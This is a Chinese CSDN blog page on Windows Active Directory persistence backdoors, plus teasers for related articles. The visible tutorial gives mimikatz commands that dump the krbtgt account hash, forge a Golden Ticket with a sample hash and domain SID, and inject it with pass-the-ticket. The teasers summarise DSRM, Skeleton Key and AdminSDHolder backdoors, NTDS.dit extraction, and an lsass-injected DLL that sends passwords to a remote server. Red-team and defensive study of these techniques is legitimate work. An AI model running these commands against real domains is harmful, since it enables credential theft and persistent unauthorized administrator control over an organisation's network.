域内持久化后门

最新推荐文章于 2023-11-20 15:52:29 发布

红队蓝军

最新推荐文章于 2023-11-20 15:52:29 发布

阅读量530

点赞数

文章标签：哈希算法 windows microsoft 系统安全

本文链接：https://blog.csdn.net/hongduilanjun/article/details/127641339

版权

本文详细介绍了Windows域内的高级攻击技术，包括金票（Golden Ticket）的创建与利用，银票（Silver Ticket）的生成，以及AdminSDHolder组的滥用，用于持久化的权限提升和系统安全绕过。通过收集krbtgt密码信息，获取服务账号的NTLM Hash，并利用mimikatz等工具，实现对域控的深层渗透。

摘要由CSDN通过智能技术生成

0x01 金票

可以使用krbtgt的NTLM hash创建作为任何用户的有效TGT。要伪造黄金票据的前提是知道域的SID和krbtgt账户的hash或者AES-256值。

1.1 收集krbtgt密码信息

privilege::debug
lsadump::lsa /inject /name:krbtgt

得到krbtgt的hash：

c73caed3bc6f0a248e51d37b9a8675fa

域sid值：

S-1-5-21-151877218-3666268517-4145415712

1.2 金票利用

使用mimikatz伪造kerberos票证

生成gold.kribi

mimikatz "kerberos::golden /domain:redteam.local /sid:S-1-5-21-151877218-3666268517-4145415712
/krbtgt:c73caed3bc6f0a248e51d37b9a8675fa /user:administrator
/ticket:gold.kirbi"

可以看到没有任何票证。

导入gold.kribi

kerberos::ptt C:\Users\jack\Desktop\gold.kirbi

成功导入administrator票据。

可以通过事件管理器查看到是以administrator来登录的

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

红队蓝军

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

域控权限持久化之DSRM后门

谢公子的博客

02-27

2086

DSRM域后门 DSRM是Windows域环境中域控制器的安全模式启动选项。每个域控制器都有一个本地管理员账号(也就是DSRM账号)。DSRM的用途是：允许管理员在域环境中出现故障或崩溃时还原、修复、重建活动目录数据库，使域环境的运行恢复正常。在域环境创建初期，DSRM的密码需要在安装DC时设置，且很少会被重置。修改DSRM密码最基本的方法是在DC撒花姑娘运行 ntdsutil 命令...

域控权限持久化之Skeleton Key(万能密码)

谢公子的博客

02-27

2951

使用Skeleton Key(万能密码)，可以对域内权限进行持久化操作。 mimikatz注入Skeleton Key Skeleton Key攻击的防御措施 2014年，微软在Windows操作系统中增加了LSA保护策略，以防止lsass.exe进程被恶意注入，从而防止mimikatz在非允许的情况下提升到Debug权限。通用的Skeleton Key的防御措施列举如下：域管理员用户设...

参与评论您还未登录，请先登录后发表或查看评论

12.3、后渗透测试--持久化后门

无痕的博客

12-13

2552

metasploit后渗透测试--持久化后门

利用AdminSDHolder进行权限维持

Shanfenglan's blog

12-23

4万+

文章目录前言利用思路参考文章前言 AdminSDHolder可以理解成是域内很多个组的集合体，如果一个用户能完全控制AdminSDHolder，那么它就能同时控制域内的许多组，AdminSDHolder内部的组如下： Administrators Domain Admins Account Operators Backup Operators Domain Controllers Enterprise Admins Print Operators Replicator Read-only Domain

渗透测试——漏洞扫描工具

最新发布

wuli1024的博客

11-20

1364

然后还要将all这个压缩包里的plugin_feed_info.inc提取出来，命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc，然鹅，我提取不出来。将下载好的插件移动到Nessus目录下，然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好，随后将会更新补丁，OK，这样Nessus可以使用了。将会获得一串数字，然后去激活码的这个网站，输入自己的邮箱获取激活码。

AD域内委派后门详解-1

06-19

【AD域内委派后门详解-1】域委派是Windows域环境中的一种权限管理机制，它允许将特定用户的权限授予服务账号，让服务账号能够代表这些用户执行操作。这种机制在正常情况下用于提高服务的运行效率和服务的安全性，...

Metasploit 持久化与后门技术

# 1. 简介 ## 1.1 Metasploit概述 Metasploit是一个开源的...持久化与后门技术在渗透测试和黑客攻击中起着至关重要的作用。持久化技术允许攻击者在受害系统上保持长久的存在，从而继续进行进一步的攻击和数据窃取。

内网渗透-域内的权限维持

lza20001103的博客

10-01

1067

域内的权限维持文章目录域内的权限维持前言PTTTGT（黄金票据）sspSkeleton KeySID History后记前言上期我们讲了windows和Linux中的权限维持，这期我们讲一下域内的权限维持，权限维持是后渗透必不可少的环节，大家一定要好好掌握啊。 PTT PTT（票据） window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE

DSRM后门——域渗透

include_voidmain的博客

04-21

2554

0x01 DSRM介绍目录服务恢复模式(DSRM，Directory Services Restore Mode)，是Windows服务器域控制器的安全模式启动选项。域控制器的本地账户也就是DSRM账户，DSRM密码是在DC创建时设置的，一般很少更改。DSRM允许管理员用来修复或还原修复或重建活动目录数据库。如果DSRM密码忘了，可以使用命令行工具NTDSUtil进行更改。 DSRM 对域环境的持久化操作目前只能在安装KB96-1320的windows -server2008及以后版本，windows

mimikatz常用命令总结

热门推荐

Shanfenglan's blog

08-27

24万+

前言在管理员权限下使用，如果没有管理员权限，基本每个功能都无法正常使用，切记。命令普通管理员权限可以执行的命令(密码查询与权限检测与日志记录) lsadump::lsa /inject 可以查看所有用户的所有详细信息 privilege::debug 打开第一个命令，且必须执行。 log 将这条命令执行后的所谓有输出存在当前目录下的mimikatz.log文件中。 sekurlsa::logonpasswords 列出已登陆用户的密码（比较常用）域控权限才能执行的命令 lsadump::dc

从域控制器中提取Active Directory数据库(NTDS.DIT)

Ping_Pig的博客

10-23

2876

目录讲在前面：本地安全机构子系统服务（LSASS）场景思考注意 ntds.dit介绍：https://blog.csdn.net/qq_41874930/article/details/108141331 部分方法如下：使用NTDSUtil的Create IFM在DC上本地捕获ntds.dit文件使用VSS卷影副本远程拉ntds.dit 使用PowerSploit的Invoke-NinjaCopy远程拉ntds.dit（需要在目标DC上启用PowerShell远程处理）注意

Mimikatz获取系统密码攻防研究

weixin_44023460的博客

06-23

4617

Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具，本意是用来个人测试，但由于其功能强大，能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试，可以说是渗透必备工具，从早期1.0版本到现在的2.1.1 20180205版本，其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件（mimilib.dll、mimikatz.exe、mimidrv.sys），分为Win32位（多了一个mimilove.exe文件）和X64位。通过它们可以提升进程权限、注

windows操作系统常见持久性后门

weixin_42282189的博客

10-14

2688

windows操作系统常见持久性后门 0x00 简介当我们拿到域中最高权限之后，就需要将自己的权限进行巩固，进行权限持久化操作。 0x01 隐藏账户 1.1 测试系统 win 7 1.2 新建特殊账户在目标主机cmd中输入以下命令，创建一个名为whoami$的隐藏账户，并把该隐藏账户设置为管理员权限 net user whoami$ howe7 /add net localgroup administrators whoami$ /add 注：创建的用户名必须以$符

【域权限维持】-AdminSDHolder

qq_41617902的博客

01-20

292

域权限维持-AdminSDHolder

如何在Windows AD域中驻留ACL后门

蚁景网安学院

12-07

883

当拿下域控权限时，为了维持权限，常常需要驻留一些后门，从而达到长期控制的目的。Windows AD域后门五花八门，除了常规的的添加隐藏用户、启动项、计划任务、抓取登录时的密码，还有一些基于ACL的后门。

内网常见域内攻击

Amire0x的小乐园

11-30

1326

域内攻击 kerberos攻击利用黄金票据+dcsync获取密码先获取黄金票据获取密码 lsadump::dcsync /user:用户 /domain:域名称成功域用户、密码枚举工具用户枚举先导入 Import-Module .\DomainPasswordSpray.ps1 然后执行 Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -

常见的几种Windows后门持久化方式

qq284489030的博客

05-09

2131

0×0 背景 持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后，通过在服务器上放置一些后门（脚本、进程、连接之类），来方便他以后持久性的入侵，简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用。 0×1 注册表自启动最常见的在指定键值添加一个新的键值类型为REG_SZ,数据项中添写需要运行程序的路径即可以启动，此类操作一些较为敏感容易被本地AV...

常见域后门技术总结与分析利用

m0_61869253的博客

08-09

217

当获取到域控的权限后，为了防止对域控权限的丢失，hacker也会使用一些技术来维持已获取到的域权限。因此，本文对常见的域后门技术进行了总结并对其利用方式进行了详细的说明，希望可以对大家的学习提供一些帮助。本文仅仅只对常见的域后门技术进行了总结，希望可以对大家的学习有帮助。如有不对，欢迎指正。重新编译生成 HookPasswordChange.dll 并注入 lsass.exe 进程，当管理员修改密码时，将通过 HTTP POST方法将用户密码外带到远程服务器。

Redis RDB持久化详解

"Redis的RDB持久化是将内存中的数据以二进制文件形式存储到硬盘上，以防服务器关闭导致数据丢失。Redis提供RDB和AOF两种持久化方式，RDB会在特定条件下生成快照，用于数据备份、恢复和迁移。RDB文件创建有三种常见...